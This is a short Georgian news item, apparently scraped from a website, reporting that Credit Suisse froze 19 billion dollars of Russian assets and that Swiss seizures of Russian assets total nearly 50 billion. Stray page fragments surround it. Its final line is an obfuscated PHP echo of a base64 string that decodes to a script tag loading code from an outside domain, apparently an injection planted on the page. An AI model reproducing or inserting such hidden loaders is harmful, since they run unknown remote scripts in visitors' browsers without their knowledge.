celsiusi
ავერსი საქკაბელი
შვეიცარიის სიდიდით მეორე ბანკმა, „კრედიტ სუისმა“ რუსეთის 19 მილიარდი დოლარის აქტივები გაყინა.
შვეიცარიული მედიის ცნობით, ეს არის ბევრად დიდი რაოდენობის აქტივები ვალუტაში, ვიდრე ოფიცილურად იყო ცნობილი. ოფიციალურად შვეიცარიულ ბანკს გაცხადებული ჰქონდა, რომ 8.1 მილიარდი დოლარის რუსული აქტივები ჰქონდა გაყინული.
აღნიშნული თანხიდან ოთხი მილიარდი შვეიცარიის სანქციების ქვეშ მოქცეულ ადამიანებს ეკუთვნით, დანარჩენი აქტივები კი რუსების ფულია, რომლებიც ევროპის სხვა ქვეყნების შეზღუდვების ქვეშ არიან.
ამასთან, შვეიცარიაში რუსეთის მოქალაქეების საკუთრებაში არსებული 15 ქონება დაყადაღდა. საერთო ჯამში, დროებით ჩამორთმეული აქტივების რაოდენობამ თითქმის 50 მილიარდ დოლარს მიაღწია.
384
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");